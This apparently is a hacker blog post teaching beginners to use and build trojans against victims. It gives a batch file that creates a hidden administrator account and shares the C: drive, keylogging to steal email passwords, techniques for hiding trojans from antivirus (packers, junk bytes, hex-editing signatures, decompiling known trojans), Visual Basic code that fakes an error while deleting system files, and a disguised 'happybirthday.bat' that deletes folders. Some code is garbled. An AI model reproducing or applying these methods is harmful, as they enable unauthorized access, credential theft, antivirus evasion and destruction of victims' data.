A Trojan is a Remote Admin Tool , this a server that runs invisible on the victim and the client that you run on your computer to take control of the victim ,you cant connect to the victim if he hasnt run the file yet ,there are many trojans around with different commands , layouts , extras ect , the trojans usually include a server builder that its safe to run on your computer you can browse to the server.exe and edit some options , like passwords or ports before sendin it...
How it works
When the victim runs the server.exe the server runs invisible on the victim ,he doesnt see anything.The server keeps a port open lets say 27374 port and waits for a connection , some servers of some trojans may have passwords in that case the server is stand by for a connection and a password , when you log into the victim the server enables you to run many commands by pressing buttons in your client ,the trojans were made to run those commands faster by pressing buttons.
Antiviruses
All the antiviruses like Mc Affee ,Norton etc will identify a virus and try to delete all the trojan servers you plan to send to your victims , also all the trojan clients even the server editor are identified like viruses with all their files so dont spam saying that such files are infected, they are not, they are original viruses.
What to do with a trojan
You can play with it, open the cds and laugh like stupid that you are, or redirect ports for other purposes,enable keyloggers and get the passwords, log on into their mails,, you might key-log something.you can make them log in irc servers like bots to see whos online and a lot more.
-------------------------------------------------------------------------------------------------
******************************
MAKING YOUR OWN TROJAN IN A BAT FILE
-------------------------------------------------------------------------------------------------
Starting
Server:- The plan here is to share the C: drive and make a new user with administrators access Step one -> Open a dos prompt and a notebook The dos prompt will help you to test if the commands are ok and the notebook will be used to make the .bat file. Command n 1-> net user neo /add What does this do? It makes a new user called neo you can put any name you whant Command n 2-> net localgroup administrators neo /add This is the command that make your user go to the administrators group. Depending on the windows version the name will be different. If you got an american version the name for the group is Administrators and for the portuguese version is administradores so it's nice yo know wich version of windows xp you are going to try share. Command n 3->net share system=C:\ /unlimited This commands share the C: drive with the name of system. Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend. -!extras!- Command n 4-> net send urip I am ur server Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip. ->To see your ip in the dos prompt put this command: ipconfig -----------------------: Client :---------------- Now that your friend opened your .bat file her system has the C: drive shared and a new administrator user. First we need to make a session with the remote computer with the net use command , you will execute these commands from your dos prompt. Command n 1 -> net use \\victimip neo This command will make a session between you and the victim Of course where it says victimip you will insert the victim ip. Command n 2-> explorer \\victimip\system And this will open a explorer windows in the share system wich is the C: drive with administrators acce
***********************
-------------------------------------------------------------------------------------------------
MAKING YOUR TROJAN UD
this tutorial will be showing you 4 ways of how to make a Trojan undetectable to Anti-Virus software.
1. Encryptors/Compressors:
You would think this should be the easiest way to UD (Undetect) a Trojan...but alas, it is not. The problem is simply this, most people use the same Trojans and Packers so often that Anti-Virus software knows pretty much all the signatures. They either use Ardamax Keylogger, Optix Pro, Beast, ProRat etc. for Trojans. For Packers they use UPX, PECompress, AsPack, Mophine etc. Again, none of these combinations work because all the signatures have been flagged. The best way this option will work is to find lesser known Packers and Trojans to work with.
Try a Google search for Executable Packers. Get a few that you have not heard of before or that have a decent rating. If it is not freeware, I am sure there will be a Crack for it. For Trojans, three good resources are VXChaos, LeetUpload or VX Heaven. Remember to pick the ones that are not well known and try to mix and match those Trojans and Packers.
2. Byte Adders:
This technique allows you to add junk bytes to your Trojan as to confuse Anti-Virus software. It does this by moving the code around inside the executable as the bytes are being added. This means that the signature will not be in the place the Anti-Virus expects it to be. A good tool for this would be StealthTools v2.0 by Gobo.
3. Hex Editing:
This is much more complicated and takes a lot more practice to get right. The idea here is to find the signature that Anti-Virus software has flagged inside of your Trojan and change it by adding a different byte, or changing the Offset to one of its other equivalents.
The three things you will need here is a File Splitter, Hex Editor and a Anti-Virus Offset Finder. The File Splitter will cut your executable into smaller files (preferably 1 byte per file). You then use your Hex Editor on the file that holds the signature and change that signature. Or, you can keep the file complete and use your AV Offset Finder to find the Offsets automatically and just change the signatures found with your Hex Editor.
Step One: Place your Trojan Server in a folder.
2) Split your Server with your File Splitter into 1 byte per file. This may make a lot of files in your folder (depending on how large the Server is), but it is worth it because you will know that only one or two of those files has the signature that is flagged and all the rest are clean.
3) Scan your folder with your Anti-Virus software and make note of which files it says are infected. Those will be the ones you edit.
4): Open up each infected file with your Hex Editor and change the Offset. There is no fool proof way of doing this, you will have to experiment. Since this will be a 1 byte file, there will not be much you need to change. Just change one character or byte at a time and then save your progress. Re-scan to see if it worked. If it did not, go back and try again.
6) Once you feel that you have found all signatures and changed them, Rejoin your files with your File Splitter and test your Server to see if it works. Remember that too much Editing will make your Server useless so be careful.
7)(Optional) Another good way is to use a Anti-Virus Offset Finder that will find the correct Offset automatically so you do not have to search for them or split your Server. Get AV Devil 2.1 to find the Offsets (password is: to0l-base).
You have to remember that different AV software use different signatures, so scan with as many as you can.
4. Source:
The best way to make an undetectable Trojan has always been to make your own. I know it may seem like a daunting task to do, but its simpler then you think. Here I will give a few options on how to do this. The reason why you would want to make your own Trojan is the fact that each time it is compiled, it is given a new signature. Changing just a single string in the Source code can make it undetectable.
Option 1: Free Trojan Source Code.
Finding free Trojan source code is not hard. Again, going to places like VXChaos or Planet Source Code can yield a plethora of really good and lesser known Trojan code. Pick what Programming Language you like and look for examples. Not much needs to be changed to makes these undetectable. A simple recompile will sometimes do the trick.
Option 2: Decompiling.
Some may call this "Stealing" source code. I like to call it "Borrowing". The first thing you need to know is what language your Trojan is in. Lets say your Trojan was Optix Pro, your programming language would be Delphi. A good Delphi Decompiler would be DeDe. Decompile Optix Pro with DeDe then recompile it with a Delphi compiler and viola! Just change a few strings around within the source and you should have a undetectable Optix Pro.
Another way would be to open your Trojan with a Debugger or Disassembler. Copy down the ASM code and then recompile it in a ASM compiler. That maybe a bit more tricky, but the idea is the same. Try to convert the executable into pure ASM as best you can. There are many free Debuggers/Disassemblers, Google for them.
if you do find a way of making a Trojan undetectable, DONT disclose it. your Trojan detected in a short amount of time. What is here are the basics of UDing. It will be up to you to make it work.
-------------------------------------------------------------------------------------------------
Simple Virus That Copies itself to start up,disables the
start bar,msconfig,ccleaner, regedit,and taskmgr.it also disables the mouse plus keyboard
disables the mouse plus keyboard beeps,generates infinite folders
and bloats your RAM!!
R.I.P Windows
*****************************/
#include
Visual Basic 6 - Creating a Simple Virus
Now many of you feel that creating a virus is impossible especially for you beginners.
Well this tutorial shows you how to create a simple virus with just a few lines of code.
A virus can be an application that deletes files upon request, this is seen as infecting your
computer because by deleting key files you may need to take action to get your computer
back to normal.
First of all open a new Visual Basic project,a standard exe file
it depends on how you want your virus to work, it is best if it is activated once your application is opened, the main code codes in the form load sub.On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on.In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab.
Private Sub Form_Load()
Text1.Text = "C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub
Once the project is opened then the command file will be removed.Now heres an example of this using a command button. Put the following code in the command button and in the form load.You can give the text box a name to make it quicker. Its labelled 'A'
Private Sub Form_Load()
Text1.Text = "C/Windows/System32/cmd.exe"
A = Text1.Text
End Sub
Private Sub Command1_Click
Kill A
End Sub
Once the command button is clicked the command file will be deleted.Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn't got enough memory to run, but in actual fact the victim doesn't know that you have just removed their command file.
Here is to go about it.
Private Sub Form_Load()
Form1.Visible = False
Text1.Text = "C:/Windows/System32/cmd.exe"
A = Text1.Text
Msgbox ("Runtime Error 492. Not Enough Memory."), vbCritical, "Runtime Error"
End Sub
Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Timer1.Enabled = False
End Sub
All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that's how simple it can be to fool someone. we can now make it a little more difficult if you are finding the above a little too easy.How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well.
The example below shows how to remove the files when the application is loaded, we wont be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below.So in the form load part put the following code.
Private Sub Form_Load()
Form1.Visible = False
Msgbox ("Runtime Error 492. Not Enough Memory."), vbCritical, "Runtime Error"
Kill "C:/Windows/System32/cmd.exe" s
Kill "C:/Windows/regedit.exe"
End Sub
Kill "C:/cmd.exe"
**************************************************************************************
Small virus as a bat file
First open notepad & paste
rmdir C:\Documents and Settings\S\Q
Then save this as a name you will remember or that the victim wont suspect
but it must end in .bat
so for example the of your file will be
happybirthday.bat
Now you must pass this to your victim ,if the file is opened
the folder "my documents & settings will be
deleted.If your targeting a particular folder then change the folder name
-in this case-
my documents & settings,but you can name it what you like
as long as you give the correct path
again- in this case the path is c: but if just your trying to delete
the evidence of some pictures from your dirty weekend away
rather than ruin someone`s whole computer thenyou will need to give the
correct path for the virus to takein the my pictures scenario
the correct path would be-
d:\my pictures\S\Q
if your not sure then copy & paste the code & alter it
to suit your needs
0 comments:
Post a Comment